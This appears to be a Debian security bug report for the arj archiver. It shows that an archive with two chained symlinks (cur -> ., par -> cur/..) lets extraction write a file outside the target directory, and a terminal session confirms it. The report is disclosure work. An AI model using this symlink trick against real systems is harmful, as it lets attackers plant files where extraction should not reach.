Package: arj Version: 3.10.22-15 Tags: security The attached archive contains two symlinks and a regular file:
cur -> .
par -> cur/..
par/moo
This setup defeats ARJ's directory traversal protections:
$ ls ../moo
/bin/ls: cannot access '../moo': No such file or directory
$ arj x traversal-dirsymlink2.arj
ARJ32 v 3.10, Copyright (c) 1998-2004, ARJ Software Russia. [04 Jun 2016]
Processing archive: traversal-dirsymlink2.arj
Archive created: 2017-07-06 22:51:02, modified: 2017-07-06 22:51:02
Extracting cur (SymLink) OK
Extracting par (SymLink) OK
Extracting par/moo OK
3 file(s)
$ ls ../moo
../moo
--
Jakub Wilk
traversal-dirsymlink2.arj
Description: Binary data
